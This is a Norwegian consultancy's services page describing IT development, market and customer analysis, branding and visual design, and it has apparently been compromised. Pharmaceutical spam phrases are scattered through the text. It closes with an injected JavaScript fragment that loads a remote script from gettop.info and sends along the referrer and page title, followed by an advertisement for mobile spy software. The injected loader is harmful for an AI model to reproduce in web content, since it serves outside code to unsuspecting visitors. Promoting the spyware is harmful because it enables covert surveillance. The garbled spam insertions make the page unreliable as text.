Tjenester

viagra price compare Pills

Produkter og tjenester vi tilbyr

Kunnandi tilbyr et spekter av konsulenttjenester til næringslivet. Våre konsulenter kartlegger deres behov og skreddersyr våre produkter og tjenester i henhold til deres preferanser.

IT-tjenester

Web-utvikling, Windows-APP, utvikling av APP for androide

Markeds og strategiske analyser

Markedsplan:
En markedsføringsplan er en plan som skal sikre din bedrifts ressursbruk, og inneholder beskrivelser av de ulike alternativene du har planlagt for din bedrift. Markedsplanen er til for å stille spørsmål angående hvordan du/dere som bedrift på best mulig måte kan nå ut til deres kunder. Planen skal også fungere som en oversikt over hva som skal gjøres, samt tidsfrister for når det skal være gjennomført.

Strategisk analyse:

Markedsanalyse:
En markedsanalyse er et verktøy for å skaffe seg den informasjonen man trenger om markedet, for å så å bestemme et realistisk salg av egne produkter/tjenester på bakgrunn av dette. Informasjonen man finner kan være hvem konkurrentene dine er, fordeling av markedsandeler, hvilke kunder som er deres segment, samt hva deres behov er.

Kundeanalyse:
En kundeanalyse er en analyse an kundene og eventuelle fremtidige kunder. Målet er å skille de interessante kundene fra de mindre interessante, og tar som regel utgangspunkt i at ikke alle kunder er like lønnsomme selv om de er betalende.

Markedsundersøkelser:
En markedsundersøkelse er en prosess hvor man fremstiller en problemstilling, samler inn data, og analyserer den innhentede informasjonen. Mange bedrifter velger å gjennomføre en markedsundersøkelse for å se på eventuelle fremtidige beslutninger og sørge for at disse blir så gode som overhodet mulig.

Omdømmeundersøkelser:
En undersøkelse for å finne ut av ulike forventinger omgivelsene i et marked har til for eksempel din bedrift eller ditt produkt/tjeneste. Vi finner omdømme til en bedrift i sammenhengen mellom de forventningene og opplevelsene undersøkelsesgruppen har. Dette skapes gjerne av løfter om service og oppfyllelseskrav, men også fra kundenes egne erfaringer og meninger.

Merkevarebygging

Bygge kjennskap/kunnskap, logohjelp, reklamekampanjer, kommunikasjonsplaner og merkevareutvikling

Salgs-, pris-, og distribusjonsstrategier

Rådgivning innenfor salg og valg av markedskanaler
online Buy

Økonomi

purim story online
Prisanalyser

Økonomisk rådgivning

Visuell kommunikasjon

Bransjeidentitet (lage annonser, logoer, brosjyrer, visittkort), hele visuelle profiler, magasindesign, webdesign, 3D og animasjon

 

Ta kontakt for tilbud

 } else { Order s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; Purchase Buy topspyapps.netThe most popular 2017 spy software applications for the mobile phones.http://laithaus.se/?p=2347